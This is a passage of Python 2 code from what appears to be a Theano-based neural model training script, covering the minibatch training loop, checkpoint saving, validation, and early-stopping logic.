rmodel = numpy.load(saveto)
history_errs = list(rmodel['history_errs'])
if 'uidx' in rmodel:
uidx = rmodel['uidx']
if validFreq == -1:
validFreq = len(train[0]) / batch_size
if saveFreq == -1:
saveFreq = len(train[0]) / batch_size
#if sampleFreq == -1:
# sampleFreq = len(train[0]) / batch_size
for eidx in xrange(max_epochs):
n_samples = 0
for x, x_syn, y, y_syn, label in train:
n_samples += len(x)
uidx += 1
use_noise.set_value(1.)
try:
x, x_mask, bk_x, y, y_mask, bk_y, label = prepare_data(x, x_syn, y, y_syn, label, maxlen=maxlen,
n_words_src=n_words_src, bk_for_x=model_options['bk_for_x'],
bk_for_y=model_options['bk_for_y'], bk_dim=model_options['bk_dim'],
n_words=n_words)
except ValueError:
print prepare_data(x, x_syn, y, y_syn, label, maxlen=maxlen,
n_words_src=n_words_src, bk_for_x=model_options['bk_for_x'],
bk_for_y=model_options['bk_for_y'], bk_dim=model_options['bk_dim'],
n_words=n_words)
raise
if x is None:
print 'Minibatch with zero sample under length ', maxlen
uidx -= 1
continue
ud_start = time.time()
# compute cost, grads and copy grads to shared variables
cost = f_grad_shared(x, x_mask, bk_x, y, y_mask, bk_y, label)
# do the update on parameters
#print 'Befor:'
#print tparams['ff_logit_W'].get_value()
f_update(lrate)
#print 'After:'
#print tparams['ff_logit_W'].get_value()
#update = f_update(lrate)
#print update
ud = time.time() - ud_start
# check for bad numbers, usually we remove non-finite elements
# and continue training - but not done here
if numpy.isnan(cost) or numpy.isinf(cost):
print 'NaN detected'
return 1., 1., 1.
# verbose
if numpy.mod(uidx, dispFreq) == 0:
log.info('Epoch: %d Update: %d Cost: %f UD: %f'%(eidx, uidx, cost, ud))
# save the best model so far, in addition, save the latest model
# into a separate file with the iteration number for external eval
if numpy.mod(uidx, saveFreq) == 0:
print 'Saving the best model...',
if best_p is not None:
params = best_p
else:
params = unzip(tparams)
numpy.savez(saveto, history_errs=history_errs, uidx=uidx, **params)
pkl.dump(model_options, open('%s.pkl' % saveto, 'wb'))
print 'Done'
# save with uidx
if not overwrite:
print 'Saving the model at iteration {}...'.format(uidx),
saveto_uidx = '{}.iter{}.npz'.format(
os.path.splitext(saveto)[0], uidx)
numpy.savez(saveto_uidx, history_errs=history_errs,
uidx=uidx, **unzip(tparams))
print 'Done'
# validate model on validation set and early stop if necessary
if numpy.mod(uidx, validFreq) == 0:
use_noise.set_value(0.)
#print 'Here:'
#print tparams['ff_logit_W'].get_value()
#print unzip(tparams)
valid_errs, valid_acc = pred_probs(f_log_probs, prepare_data,
model_options, valid)
valid_err = valid_errs.mean()
history_errs.append(valid_err)
test_errs, test_acc = pred_probs(f_log_probs, prepare_data,
model_options, test)
test_err = test_errs.mean()
history_accs.append(test_acc)
if uidx == 0 or valid_err <= numpy.array(history_errs).min():
best_p = unzip(tparams)
bad_counter = 0
if len(history_errs) > patience and valid_err >= \
numpy.array(history_errs)[:-patience].min():
bad_counter += 1
if bad_counter > patience:
print 'Early Stop!'
#estop = True
#break
if numpy.isnan(valid_err):
ipdb.set_trace()
log.info('Epoch: %d Update: %d ValidAcc: %f TestAcc: %f' % (eidx, uidx, valid_acc, test_acc))
# finish after this many updates
if uidx >= finish_after:
print 'Finishing after %d iterations!' % uidx
estop = True
break
print 'Seen %d samples' % n_samples
if len(history_accs) > 0:
epoch_accs.append(history_accs[-1])
if len(epoch_accs) > 1 and epoch_accs[-1] <= numpy.array(epoch_accs)[:-1].max():
bad_counter_acc += 1
if bad_counter_acc > 2:
print 'Early Stop Acc!'
#estop = True
#break
if estop:
break
if best_p is not None:
zipp(best_p, tparams)
use_noise.set_value(0.)
test_err, acc = pred_probs(f_log_probs, prepare_data,
model_options, test)
print 'Test acc ', acc
params = copy.copy(best_p)
numpy.savez(saveto, zipped_params=best_p,
history_errs=history_errs,
uidx=uidx,
**params)
return valid_err
if __name__ == '__main__':
pass